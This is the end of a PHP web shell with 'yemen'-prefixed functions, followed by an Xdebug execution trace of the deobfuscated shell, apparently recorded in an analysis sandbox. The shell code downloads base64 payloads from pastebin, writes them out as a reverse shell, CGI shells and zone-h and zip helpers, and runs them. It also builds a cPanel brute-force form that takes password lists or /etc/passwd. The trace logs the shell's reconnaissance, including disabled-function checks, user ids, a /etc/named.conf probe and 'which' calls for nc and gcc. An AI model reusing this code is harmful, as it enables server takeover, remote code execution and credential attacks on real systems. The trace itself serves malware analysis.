:</strong></td>\r\n <td valign=\"top\" bgcolor=\"#151515\" colspan=\"5\"><strong><textarea cols=\"40\" rows=\"10\" name=\"usernames\"></textarea></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\" bgcolor=\"#151515\" class=\"style2\" style=\"width: 139px\">\r\n\t<strong>Pass :</strong></td>\r\n <td valign=\"top\" bgcolor=\"#151515\" colspan=\"5\"><strong><textarea cols=\"40\" rows=\"10\" name=\"passwords\"></textarea></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\" bgcolor=\"#151515\" class=\"style2\" style=\"width: 139px\">\r\n\t<strong>Type :</strong></td>\r\n <td valign=\"top\" bgcolor=\"#151515\" colspan=\"5\">\r\n <span class=\"style2\"><strong>Simple : </strong> </span>\r\n\t<strong>\r\n\t<input type=\"radio\" name=\"type\" value=\"simple\" checked=\"checked\" class=\"style3\"></strong>\r\n <font class=\"style2\"><strong>/etc/passwd : </strong> </font>\r\n\t<strong>\r\n\t<input type=\"radio\" name=\"type\" value=\"passwd\" class=\"style3\"></strong><span class=\"style3\"><strong>\r\n\t</strong>\r\n\t</span>\r\n </td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\" bgcolor=\"#151515\" style=\"width: 139px\"></td>\r\n <td valign=\"top\" bgcolor=\"#151515\" colspan=\"5\"><strong><input type=\"submit\" value=\"start\">\r\n </strong>\r\n </td>\r\n <tr>\r\n</form> \r\n \r\n \r\n \r\n';\r\nif(\$_POST['att']==null)\r\n{\r\necho '\t\t\t\t\t\t ';\r\n}else{\r\necho \"\t\t\t\t\t\t \r\n\t\t\t\t\t\t \r\n\";\r\n}");
fclose($file);
echo "<iframe src=\"cpanel.php\" style=\"height:500px;\r\n\r\n\r\n width:1500px;\r\n\r\n\r\n border:0px;\r\n\r\n\r\n\" name=\"brute\">";
yemenfooter();
}
function yemenrev()
{
$reverse = file_get_contents('http://pastebin.com/raw.php?i=8AxYU3Rd');
$file = fopen("rev.php", "w+");
$write = fwrite($file, base64_decode($reverse));
fclose($file);
yemenhead();
echo "<iframe src=\"rev.php\" style=\"height:500px;\r\n\r\n\r\n width:500px;\r\n\r\n\r\n border:0px;\r\n\r\n\r\n\" name=\"reverse\">";
yemenfooter();
}
function yemenconpass()
{
yemenhead();
echo "<center><embed src=\"http://nyccah.rayogram.com/3Turr\" style=\"height:250px;\r\n\r\n\r\n width:99%;\r\n\r\n\r\n border:4px solid #ccc;\r\n\r\n\r\n;\r\n\r\n\r\n\" name=\"conpass\" ></embed></center>";
yemenfooter();
}
function yemenperl()
{
mkdir('cgirun', 0755);
chdir('cgirun');
$kokdosya = ".htaccess";
$dosya_adi = ".htaccess";
$dosya = fopen($dosya_adi, 'w') or die("khong the tao shell!");
$metin = "AddHandler cgi-script .pr";
fwrite($dosya, $metin);
fclose($dosya);
$cgico = @file_get_contents('http://pastebin.com/raw.php?i=7xJptQEY');
$file = fopen("cgi.pr", "w+");
$write = fwrite($file, base64_decode($cgico));
fclose($file);
chmod("cgi.pr", 0755);
yemenhead();
echo "<iframe src=\"cgirun/cgi.pr\" style=\"height:500px;\r\n\r\n\r\n width:1000px;\r\n\r\n\r\n border:0px;\r\n\r\n\r\n\" name=\"config\">";
}
function yemenperl4()
{
mkdir('cgirun', 0755);
chdir('cgirun');
$dosya = fopen('.htaccess', 'w') or die("Do it manually !");
$metin = "AddHandler cgi-script .pr";
fwrite($dosya, $metin);
fclose($dosya);
$cgico = file_get_contents('http://pastebin.com/raw.php?i=hsMFJvrK');
$file = fopen("cgi4.pr", "w+");
$write = fwrite($file, base64_decode($cgico));
fclose($file);
chmod("cgi4.pr", 0755);
yemenhead();
echo "<iframe src=\"cgirun/cgi4.pr\" style=\"height:500px;\r\n\r\n\r\n width:1000px;\r\n\r\n\r\n border:0px;\r\n\r\n\r\n\" name=\"config\">";
}
function yemenzone()
{
yemenhead();
$zone1 = file_get_contents('http://pastebin.com/raw.php?i=jwz4TeZq');
$file = fopen("zone.php", "w+");
$write = fwrite($file, base64_decode($zone1));
fclose($file);
echo "<iframe src=\"zone.php\" style=\"height:500px;\r\n\r\n\r\n width:1500px;\r\n\r\n\r\n border:0px;\r\n\r\n\r\n\" name=\"zone\">";
yemenfooter();
}
function yemenzonejoy()
{
yemenhead();
$zone1 = file_get_contents('http://pastebin.com/raw.php?i=aLsyUHdu');
$file = fopen("zonejoy.php", "w+");
$write = fwrite($file, base64_decode($zone1));
fclose($file);
echo "<iframe src=\"zonejoy.php\" style=\"height:500px;\r\n\r\n\r\n width:1500px;\r\n\r\n\r\n border:0px;\r\n\r\n\r\n\" name=\"zonejoy\" />>";
yemenfooter();
}
function yemenzip()
{
yemenhead();
$zip1 = file_get_contents('http://pastebin.com/raw.php?i=bTR5Pb38');
$file = fopen("zip.php", "w+");
$write = fwrite($file, base64_decode($zip1));
fclose($file);
echo "<iframe src=\"zip.php\" style=\"height:500px;\r\n\r\n\r\n width:1500px;\r\n\r\n\r\n border:0px;\r\n\r\n\r\n\" name=\"zip\">";
yemenfooter();
}
if (empty($_POST['a'])) {
if (isset($default_action) && function_exists('yemen' . $default_action)) {
$_POST['a'] = $default_action;
} else {
$_POST['a'] = 'FilesMan';
}
}
if (!empty($_POST['a']) && function_exists('yemen' . $_POST['a'])) {
call_user_func('yemen' . $_POST['a']);
}
exit;Execution traces
data/traces/3e5649ff5799e78998753f28f65162ce_trace-1676247232.5689.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 22:14:18.466809]
1 0 1 0.000271 393512
1 3 0 0.003678 1004504 {main} 1 /var/www/html/uploads/deobf.php 0 0
2 4 0 0.003712 1004504 define 0 /var/www/html/uploads/deobf.php 2 2 'VERSION' '2.0'
2 4 1 0.003734 1004608
2 4 R TRUE
2 5 0 0.003754 1004536 error_reporting 0 /var/www/html/uploads/deobf.php 3 1 1
2 5 1 0.003772 1004576
2 5 R 0
2 6 0 0.003790 1004536 session_start 0 /var/www/html/uploads/deobf.php 4 0
2 6 1 0.003863 1005288
2 6 R TRUE
2 7 0 0.003883 1005288 ini_set 0 /var/www/html/uploads/deobf.php 5 2 'error_log' NULL
2 7 1 0.003905 1005360
2 7 R ''
2 8 0 0.003922 1005288 ini_set 0 /var/www/html/uploads/deobf.php 6 2 'log_errors' 0
2 8 1 0.003940 1005360
2 8 R '1'
2 9 0 0.003958 1005288 ini_set 0 /var/www/html/uploads/deobf.php 7 2 'max_execution_time' 0
2 9 1 0.003978 1005392
2 9 R '30'
2 10 0 0.003995 1005288 set_time_limit 0 /var/www/html/uploads/deobf.php 8 1 0
2 10 1 0.004014 1005352
2 10 R FALSE
2 11 0 0.004033 1005320 preg_match 0 /var/www/html/uploads/deobf.php 9 2 '/(Google|robot|bot|bing|yahoo|facebook|visionutils)/Ui' 'python-requests/2.25.1'
2 11 1 0.004103 1005384
2 11 R 0
2 12 0 0.004125 1005320 base64_decode 0 /var/www/html/uploads/deobf.php 11 2 NULL TRUE
2 12 1 0.004143 1005416
2 12 R ''
1 A /var/www/html/uploads/deobf.php 12 $default_action = 'FilesMan'
1 A /var/www/html/uploads/deobf.php 13 $default_use_ajax = TRUE
1 A /var/www/html/uploads/deobf.php 14 $default_charset = 'Windows-1251'
2 13 0 0.004206 1005320 substr 0 /var/www/html/uploads/deobf.php 15 3 'Linux' 0 3
2 13 1 0.004225 1005448
2 13 R 'Lin'
2 14 0 0.004243 1005352 strtolower 0 /var/www/html/uploads/deobf.php 15 1 'Lin'
2 14 1 0.004260 1005416
2 14 R 'lin'
1 A /var/www/html/uploads/deobf.php 16 $sys = 'unix'
2 15 0 0.004292 1005320 getcwd 0 /var/www/html/uploads/deobf.php 17 0
2 15 1 0.004310 1005368
2 15 R '/var/www/html/uploads'
1 A /var/www/html/uploads/deobf.php 17 $home_cwd = '/var/www/html/uploads'
2 16 0 0.004346 1005368 base64_decode 0 /var/www/html/uploads/deobf.php 18 2 NULL TRUE
2 16 1 0.004363 1005464
2 16 R ''
2 17 0 0.004381 1005368 chdir 0 /var/www/html/uploads/deobf.php 19 1 NULL
2 17 1 0.004407 1005456
2 17 R FALSE
2 18 0 0.004425 1005416 getcwd 0 /var/www/html/uploads/deobf.php 20 0
2 18 1 0.004442 1005464
2 18 R '/var/www/html/uploads'
1 A /var/www/html/uploads/deobf.php 20 $cwd = '/var/www/html/uploads'
1 A /var/www/html/uploads/deobf.php 23 $cwd .= '/'
2 19 0 0.004491 1005464 getcwd 0 /var/www/html/uploads/deobf.php 39 0
2 19 1 0.004507 1005512
2 19 R '/var/www/html/uploads'
1 A /var/www/html/uploads/deobf.php 39 $down = '/var/www/html/uploads'
1 A /var/www/html/uploads/deobf.php 41 $down .= '/'
2 20 0 0.004554 1005512 function_exists 0 /var/www/html/uploads/deobf.php 1272 1 'posix_getpwuid'
2 20 1 0.004572 1005552
2 20 R TRUE
2 21 0 0.004589 1005512 function_exists 0 /var/www/html/uploads/deobf.php 1273 1 'posix_getgrgid'
2 21 1 0.004607 1005552
2 21 R TRUE
2 22 0 0.004624 1005512 function_exists 0 /var/www/html/uploads/deobf.php 1302 1 'scandir'
2 22 1 0.004642 1005552
2 22 R TRUE
2 23 0 0.004661 1005552 function_exists 0 /var/www/html/uploads/deobf.php 3079 1 'yemenFilesMan'
2 23 1 0.004680 1005592
2 23 R TRUE
1 A /var/www/html/uploads/deobf.php 3079 _POST['a'] = 'FilesMan'
2 24 0 0.004716 1005928 function_exists 0 /var/www/html/uploads/deobf.php 3081 1 'yemenFilesMan'
2 24 1 0.004734 1005968
2 24 R TRUE
2 25 0 0.004752 1005888 yemenFilesMan 1 /var/www/html/uploads/deobf.php 3081 0
3 26 0 0.004769 1005888 yemenhead 1 /var/www/html/uploads/deobf.php 1305 0
3 A /var/www/html/uploads/deobf.php 49 _POST['charset'] = 'Windows-1251'
4 27 0 0.004802 1005864 diskfreespace 0 /var/www/html/uploads/deobf.php 50 1 '/var/www/html/uploads/'
4 27 1 0.004834 1005896
4 27 R 203232722944
3 A /var/www/html/uploads/deobf.php 50 $freeSpace = 203232722944
4 28 0 0.004870 1005864 disk_total_space 0 /var/www/html/uploads/deobf.php 51 1 '/var/www/html/uploads/'
4 28 1 0.004890 1005896
4 28 R 232015802368
3 A /var/www/html/uploads/deobf.php 51 $totalSpace = 232015802368
3 A /var/www/html/uploads/deobf.php 52 $totalSpace = 232015802368
3 A /var/www/html/uploads/deobf.php 53 $on = '<font color=#0F0> ON </font>'
3 A /var/www/html/uploads/deobf.php 54 $of = '<font color=red> OFF </font>'
3 A /var/www/html/uploads/deobf.php 55 $none = '<font color=#0F0> NONE </font>'
4 29 0 0.004982 1005864 function_exists 0 /var/www/html/uploads/deobf.php 56 1 'curl_version'
4 29 1 0.005000 1005904
4 29 R TRUE
3 A /var/www/html/uploads/deobf.php 56 $curl = '<font color=#0F0> ON </font>'
4 30 0 0.005032 1005864 function_exists 0 /var/www/html/uploads/deobf.php 58 1 'mysql_get_client_info'
4 30 1 0.005051 1005904
4 30 R FALSE
3 A /var/www/html/uploads/deobf.php 59 $mysql = '<font color=red> OFF </font>'
4 31 0 0.005083 1005864 function_exists 0 /var/www/html/uploads/deobf.php 60 1 'mssql_connect'
4 31 1 0.005101 1005904
4 31 R FALSE
3 A /var/www/html/uploads/deobf.php 61 $mssql = '<font color=red> OFF </font>'
4 32 0 0.005136 1005864 function_exists 0 /var/www/html/uploads/deobf.php 62 1 'pg_connect'
4 32 1 0.005177 1005904
4 32 R FALSE
3 A /var/www/html/uploads/deobf.php 63 $pg = '<font color=red> OFF </font>'
4 33 0 0.005212 1005864 function_exists 0 /var/www/html/uploads/deobf.php 64 1 'oci_connect'
4 33 1 0.005230 1005904
4 33 R FALSE
3 A /var/www/html/uploads/deobf.php 65 $or = '<font color=red> OFF </font>'
4 34 0 0.005261 1005864 ini_get 0 /var/www/html/uploads/deobf.php 66 1 'disable_functions'
4 34 1 0.005280 1006344
4 34 R 'pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,'
4 35 0 0.005315 1005864 ini_get 0 /var/www/html/uploads/deobf.php 72 1 'disable_functions'
4 35 1 0.005333 1006344
4 35 R 'pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,'
4 36 0 0.005365 1006312 str_replace 0 /var/www/html/uploads/deobf.php 72 3 ',' ', ' 'pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,'
4 36 1 0.005397 1006856
4 36 R 'pcntl_alarm, pcntl_fork, pcntl_waitpid, pcntl_wait, pcntl_wifexited, pcntl_wifstopped, pcntl_wifsignaled, pcntl_wifcontinued, pcntl_wexitstatus, pcntl_wtermsig, pcntl_wstopsig, pcntl_signal, pcntl_signal_get_handler, pcntl_signal_dispatch, pcntl_get_last_error, pcntl_strerror, pcntl_sigprocmask, pcntl_sigwaitinfo, pcntl_sigtimedwait, pcntl_exec, pcntl_getpriority, pcntl_setpriority, pcntl_async_signals, '
3 A /var/www/html/uploads/deobf.php 72 $disfun = '<span>Disabled functions : </span><font color=red style="word-wrap: break-word;\r\n\r\n\r\nwidth: 80%;\r\n\r\n\r\n " >pcntl_alarm, pcntl_fork, pcntl_waitpid, pcntl_wait, pcntl_wifexited, pcntl_wifstopped, pcntl_wifsignaled, pcntl_wifcontinued, pcntl_wexitstatus, pcntl_wtermsig, pcntl_wstopsig, pcntl_signal, pcntl_signal_get_handler, pcntl_signal_dispatch, pcntl_get_last_error, pcntl_strerror, pcntl_sigprocmask, pcntl_sigwaitinfo, pcntl_sigtimedwait, pcntl_exec, pcntl_getpriority, pcntl_setpriority, pcntl_as'
4 37 0 0.005463 1006504 ini_get 0 /var/www/html/uploads/deobf.php 74 1 'safe_mode'
4 37 1 0.005481 1006536
4 37 R FALSE
3 A /var/www/html/uploads/deobf.php 75 $safe_modes = '<font color=#0F0 >OFF</font>'
4 38 0 0.005515 1006504 ini_get 0 /var/www/html/uploads/deobf.php 76 1 'open_basedir'
4 38 1 0.005532 1006536
4 38 R ''
3 A /var/www/html/uploads/deobf.php 77 $open_b = '<font color=#0F0> NONE </font>'
4 39 0 0.005565 1006504 ini_get 0 /var/www/html/uploads/deobf.php 78 1 'safe_mode_exec_dir'
4 39 1 0.005582 1006536
4 39 R FALSE
3 A /var/www/html/uploads/deobf.php 79 $safe_exe = '<font color=#0F0> NONE </font>'
4 40 0 0.005616 1006504 ini_get 0 /var/www/html/uploads/deobf.php 80 1 'safe_mode_include_dir'
4 40 1 0.005634 1006536
4 40 R FALSE
3 A /var/www/html/uploads/deobf.php 81 $safe_include = '<font color=#0F0> NONE </font>'
4 41 0 0.005666 1006504 function_exists 0 /var/www/html/uploads/deobf.php 82 1 'posix_getegid'
4 41 1 0.005691 1006544
4 41 R TRUE
4 42 0 0.005709 1006504 posix_geteuid 0 /var/www/html/uploads/deobf.php 86 0
4 42 1 0.005726 1006504
4 42 R 33
4 43 0 0.005742 1006504 posix_getpwuid 0 /var/www/html/uploads/deobf.php 86 1 33
4 43 1 0.005785 1007336
4 43 R ['name' => 'www-data', 'passwd' => 'x', 'uid' => 33, 'gid' => 33, 'gecos' => 'www-data', 'dir' => '/var/www', 'shell' => '/usr/sbin/nologin']
3 A /var/www/html/uploads/deobf.php 86 $uid = ['name' => 'www-data', 'passwd' => 'x', 'uid' => 33, 'gid' => 33, 'gecos' => 'www-data', 'dir' => '/var/www', 'shell' => '/usr/sbin/nologin']
4 44 0 0.005842 1007304 posix_getegid 0 /var/www/html/uploads/deobf.php 87 0
4 44 1 0.005858 1007304
4 44 R 33
4 45 0 0.005874 1007304 posix_getgrgid 0 /var/www/html/uploads/deobf.php 87 1 33
4 45 1 0.005909 1007968
4 45 R ['name' => 'www-data', 'passwd' => 'x', 'members' => [], 'gid' => 33]
3 A /var/www/html/uploads/deobf.php 87 $gid = ['name' => 'www-data', 'passwd' => 'x', 'members' => [], 'gid' => 33]
3 A /var/www/html/uploads/deobf.php 88 $user = 'www-data'
3 A /var/www/html/uploads/deobf.php 89 $uid = 33
3 A /var/www/html/uploads/deobf.php 90 $group = 'www-data'
3 A /var/www/html/uploads/deobf.php 91 $gid = 33
3 A /var/www/html/uploads/deobf.php 92 $cwd_links = ''
4 46 0 0.006023 1006584 explode 0 /var/www/html/uploads/deobf.php 93 2 '/' '/var/www/html/uploads/'
4 46 1 0.006042 1007192
4 46 R [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads', 5 => '']
3 A /var/www/html/uploads/deobf.php 93 $path = [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads', 5 => '']
3 A /var/www/html/uploads/deobf.php 94 $n = 6
3 A /var/www/html/uploads/deobf.php 95 $i = 0
3 A /var/www/html/uploads/deobf.php 97 $cwd_links .= '<a href=\'#\' onclick=\'g("FilesMan","'
3 A /var/www/html/uploads/deobf.php 98 $j = 0
3 A /var/www/html/uploads/deobf.php 100 $cwd_links .= '/'
3 A /var/www/html/uploads/deobf.php 100 $j++
3 A /var/www/html/uploads/deobf.php 101 $cwd_links .= '")\'>/</a>'
3 A /var/www/html/uploads/deobf.php 97 $i++
3 A /var/www/html/uploads/deobf.php 97 $cwd_links .= '<a href=\'#\' onclick=\'g("FilesMan","'
3 A /var/www/html/uploads/deobf.php 98 $j = 0
3 A /var/www/html/uploads/deobf.php 100 $cwd_links .= '/'
3 A /var/www/html/uploads/deobf.php 100 $j++
3 A /var/www/html/uploads/deobf.php 100 $cwd_links .= 'var/'
3 A /var/www/html/uploads/deobf.php 100 $j++
3 A /var/www/html/uploads/deobf.php 101 $cwd_links .= '")\'>var/</a>'
3 A /var/www/html/uploads/deobf.php 97 $i++
3 A /var/www/html/uploads/deobf.php 97 $cwd_links .= '<a href=\'#\' onclick=\'g("FilesMan","'
3 A /var/www/html/uploads/deobf.php 98 $j = 0
3 A /var/www/html/uploads/deobf.php 100 $cwd_links .= '/'
3 A /var/www/html/uploads/deobf.php 100 $j++
3 A /var/www/html/uploads/deobf.php 100 $cwd_links .= 'var/'
3 A /var/www/html/uploads/deobf.php 100 $j++
3 A /var/www/html/uploads/deobf.php 100 $cwd_links .= 'www/'
3 A /var/www/html/uploads/deobf.php 100 $j++
3 A /var/www/html/uploads/deobf.php 101 $cwd_links .= '")\'>www/</a>'
3 A /var/www/html/uploads/deobf.php 97 $i++
3 A /var/www/html/uploads/deobf.php 97 $cwd_links .= '<a href=\'#\' onclick=\'g("FilesMan","'
3 A /var/www/html/uploads/deobf.php 98 $j = 0
3 A /var/www/html/uploads/deobf.php 100 $cwd_links .= '/'
3 A /var/www/html/uploads/deobf.php 100 $j++
3 A /var/www/html/uploads/deobf.php 100 $cwd_links .= 'var/'
3 A /var/www/html/uploads/deobf.php 100 $j++
3 A /var/www/html/uploads/deobf.php 100 $cwd_links .= 'www/'
3 A /var/www/html/uploads/deobf.php 100 $j++
3 A /var/www/html/uploads/deobf.php 100 $cwd_links .= 'html/'
3 A /var/www/html/uploads/deobf.php 100 $j++
3 A /var/www/html/uploads/deobf.php 101 $cwd_links .= '")\'>html/</a>'
3 A /var/www/html/uploads/deobf.php 97 $i++
3 A /var/www/html/uploads/deobf.php 97 $cwd_links .= '<a href=\'#\' onclick=\'g("FilesMan","'
3 A /var/www/html/uploads/deobf.php 98 $j = 0
3 A /var/www/html/uploads/deobf.php 100 $cwd_links .= '/'
3 A /var/www/html/uploads/deobf.php 100 $j++
3 A /var/www/html/uploads/deobf.php 100 $cwd_links .= 'var/'
3 A /var/www/html/uploads/deobf.php 100 $j++
3 A /var/www/html/uploads/deobf.php 100 $cwd_links .= 'www/'
3 A /var/www/html/uploads/deobf.php 100 $j++
3 A /var/www/html/uploads/deobf.php 100 $cwd_links .= 'html/'
3 A /var/www/html/uploads/deobf.php 100 $j++
3 A /var/www/html/uploads/deobf.php 100 $cwd_links .= 'uploads/'
3 A /var/www/html/uploads/deobf.php 100 $j++
3 A /var/www/html/uploads/deobf.php 101 $cwd_links .= '")\'>uploads/</a>'
3 A /var/www/html/uploads/deobf.php 97 $i++
3 A /var/www/html/uploads/deobf.php 102 $drives = ''
4 47 0 0.006745 1007440 range 0 /var/www/html/uploads/deobf.php 103 2 'c' 'z'
4 47 1 0.006764 1008840
4 47 R [0 => 'c', 1 => 'd', 2 => 'e', 3 => 'f', 4 => 'g', 5 => 'h', 6 => 'i', 7 => 'j', 8 => 'k', 9 => 'l', 10 => 'm', 11 => 'n', 12 => 'o', 13 => 'p', 14 => 'q', 15 => 'r', 16 => 's', 17 => 't', 18 => 'u', 19 => 'v', 20 => 'w', 21 => 'x', 22 => 'y', 23 => 'z']
4 48 0 0.006804 1008808 is_dir 0 /var/www/html/uploads/deobf.php 103 1 'c:'
4 48 1 0.006829 1008848
4 48 R FALSE
4 49 0 0.006847 1008808 is_dir 0 /var/www/html/uploads/deobf.php 103 1 'd:'
4 49 1 0.006866 1008848
4 49 R FALSE
4 50 0 0.006883 1008808 is_dir 0 /var/www/html/uploads/deobf.php 103 1 'e:'
4 50 1 0.006902 1008848
4 50 R FALSE
4 51 0 0.006919 1008808 is_dir 0 /var/www/html/uploads/deobf.php 103 1 'f:'
4 51 1 0.006939 1008848
4 51 R FALSE
4 52 0 0.006956 1008808 is_dir 0 /var/www/html/uploads/deobf.php 103 1 'g:'
4 52 1 0.006976 1008848
4 52 R FALSE
4 53 0 0.006993 1008808 is_dir 0 /var/www/html/uploads/deobf.php 103 1 'h:'
4 53 1 0.007012 1008848
4 53 R FALSE
4 54 0 0.007029 1008808 is_dir 0 /var/www/html/uploads/deobf.php 103 1 'i:'
4 54 1 0.007048 1008848
4 54 R FALSE
4 55 0 0.007065 1008808 is_dir 0 /var/www/html/uploads/deobf.php 103 1 'j:'
4 55 1 0.007084 1008848
4 55 R FALSE
4 56 0 0.007100 1008808 is_dir 0 /var/www/html/uploads/deobf.php 103 1 'k:'
4 56 1 0.007118 1008848
4 56 R FALSE
4 57 0 0.007136 1008808 is_dir 0 /var/www/html/uploads/deobf.php 103 1 'l:'
4 57 1 0.007154 1008848
4 57 R FALSE
4 58 0 0.007170 1008808 is_dir 0 /var/www/html/uploads/deobf.php 103 1 'm:'
4 58 1 0.007189 1008848
4 58 R FALSE
4 59 0 0.007206 1008808 is_dir 0 /var/www/html/uploads/deobf.php 103 1 'n:'
4 59 1 0.007225 1008848
4 59 R FALSE
4 60 0 0.007251 1008808 is_dir 0 /var/www/html/uploads/deobf.php 103 1 'o:'
4 60 1 0.007270 1008848
4 60 R FALSE
4 61 0 0.007288 1008808 is_dir 0 /var/www/html/uploads/deobf.php 103 1 'p:'
4 61 1 0.007306 1008848
4 61 R FALSE
4 62 0 0.007323 1008808 is_dir 0 /var/www/html/uploads/deobf.php 103 1 'q:'
4 62 1 0.007341 1008848
4 62 R FALSE
4 63 0 0.007358 1008808 is_dir 0 /var/www/html/uploads/deobf.php 103 1 'r:'
4 63 1 0.007377 1008848
4 63 R FALSE
4 64 0 0.007393 1008808 is_dir 0 /var/www/html/uploads/deobf.php 103 1 's:'
4 64 1 0.007411 1008848
4 64 R FALSE
4 65 0 0.007428 1008808 is_dir 0 /var/www/html/uploads/deobf.php 103 1 't:'
4 65 1 0.007446 1008848
4 65 R FALSE
4 66 0 0.007462 1008808 is_dir 0 /var/www/html/uploads/deobf.php 103 1 'u:'
4 66 1 0.007480 1008848
4 66 R FALSE
4 67 0 0.007497 1008808 is_dir 0 /var/www/html/uploads/deobf.php 103 1 'v:'
4 67 1 0.007515 1008848
4 67 R FALSE
4 68 0 0.007532 1008808 is_dir 0 /var/www/html/uploads/deobf.php 103 1 'w:'
4 68 1 0.007551 1008848
4 68 R FALSE
4 69 0 0.007567 1008808 is_dir 0 /var/www/html/uploads/deobf.php 103 1 'x:'
4 69 1 0.007586 1008848
4 69 R FALSE
4 70 0 0.007603 1008808 is_dir 0 /var/www/html/uploads/deobf.php 103 1 'y:'
4 70 1 0.007620 1008848
4 70 R FALSE
4 71 0 0.007644 1008808 is_dir 0 /var/www/html/uploads/deobf.php 103 1 'z:'
4 71 1 0.007662 1008848
4 71 R FALSE
4 72 0 0.007681 1007440 is_writable 0 /var/www/html/uploads/deobf.php 474 1 '/var/www/html/uploads/'
4 72 1 0.007705 1007480
4 72 R TRUE
4 73 0 0.007734 1007552 htmlspecialchars 0 /var/www/html/uploads/deobf.php 535 1 '/var/www/html/uploads/'
4 73 1 0.007756 1007744
4 73 R '/var/www/html/uploads/'
4 74 0 0.007775 1007712 base64_encode 0 /var/www/html/uploads/deobf.php 535 1 '/var/www/html/uploads/'
4 74 1 0.007792 1007808
4 74 R 'L3Zhci93d3cvaHRtbC91cGxvYWRzLw=='
4 75 0 0.007816 1007664 htmlspecialchars 0 /var/www/html/uploads/deobf.php 538 1 'FilesMan'
4 75 1 0.007831 1007856
4 75 R 'FilesMan'
4 76 0 0.007846 1007680 htmlspecialchars 0 /var/www/html/uploads/deobf.php 539 1 'Windows-1251'
4 76 1 0.007860 1007872
4 76 R 'Windows-1251'
4 77 0 0.007876 1007712 strpos 0 /var/www/html/uploads/deobf.php 542 2 NULL '\r\n'
4 77 1 0.007891 1007784
4 77 R FALSE
4 78 0 0.007905 1007712 htmlspecialchars 0 /var/www/html/uploads/deobf.php 543 2 NULL 3
4 78 1 0.007920 1007944
4 78 R ''
4 79 0 0.007934 1007744 strpos 0 /var/www/html/uploads/deobf.php 546 2 NULL '\r\n'
4 79 1 0.007947 1007816
4 79 R FALSE
4 80 0 0.007960 1007744 htmlspecialchars 0 /var/www/html/uploads/deobf.php 547 2 NULL 3
4 80 1 0.007974 1007976
4 80 R ''
4 81 0 0.007988 1007776 strpos 0 /var/www/html/uploads/deobf.php 550 2 NULL '\r\n'
4 81 1 0.008000 1007848
4 81 R FALSE
4 82 0 0.008013 1007776 htmlspecialchars 0 /var/www/html/uploads/deobf.php 551 2 NULL 3
4 82 1 0.008027 1008008
4 82 R ''
4 83 0 0.008041 1007552 php_uname 0 /var/www/html/uploads/deobf.php 654 0
4 83 1 0.008056 1007664
4 83 R 'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
4 84 0 0.008075 1007664 substr 0 /var/www/html/uploads/deobf.php 654 3 'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64' 0 120
4 84 1 0.008093 1007760
4 84 R 'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
4 85 0 0.008113 1009088 phpversion 0 /var/www/html/uploads/deobf.php 662 0
4 85 1 0.008126 1009152
4 85 R '7.2.34-37+ubuntu22.04.1+deb.sury.org+1'
4 86 0 0.008143 1007552 file 0 /var/www/html/uploads/deobf.php 671 1 '/etc/named.conf'
4 86 1 0.008172 1007704
4 86 R FALSE
3 A /var/www/html/uploads/deobf.php 671 $d0mains = FALSE
4 87 0 0.008200 1007664 yemenSize 1 /var/www/html/uploads/deobf.php 684 1 232015802368
5 88 0 0.008221 1007664 sprintf 0 /var/www/html/uploads/deobf.php 1277 2 '%1.2f' 216.08155441284
5 88 1 0.008242 1008048
5 88 R '216.08'
4 87 1 0.008261 1007704
4 87 R '216.08 GB'
4 89 0 0.008280 1007792 yemenSize 1 /var/www/html/uploads/deobf.php 684 1 203232722944
5 90 0 0.008297 1007792 sprintf 0 /var/www/html/uploads/deobf.php 1277 2 '%1.2f' 189.27522277832
5 90 1 0.008316 1008176
5 90 R '189.28'
4 89 1 0.008333 1007832
4 89 R '189.28 GB'
4 91 0 0.008354 1007664 ini_get 0 /var/www/html/uploads/deobf.php 686 1 'safe_mode'
4 91 1 0.008371 1007696
4 91 R FALSE
3 A /var/www/html/uploads/deobf.php 687 $userful = [0 => 'gcc', 1 => 'lcc', 2 => 'cc', 3 => 'ld', 4 => 'make', 5 => 'php', 6 => 'perl', 7 => 'python', 8 => 'ruby', 9 => 'tar', 10 => 'gzip', 11 => 'bzip', 12 => 'bzip2', 13 => 'nc', 14 => 'locate', 15 => 'suidperl']
4 92 0 0.008421 1007664 yemenWhich 1 /var/www/html/uploads/deobf.php 688 1 'gcc'
5 93 0 0.008439 1007704 yemenEx 1 /var/www/html/uploads/deobf.php 1274 1 'which gcc'
5 A /var/www/html/uploads/deobf.php 24 $out = ''
6 94 0 0.008473 1007704 function_exists 0 /var/www/html/uploads/deobf.php 25 1 'exec'
6 94 1 0.008491 1007744
6 94 R TRUE
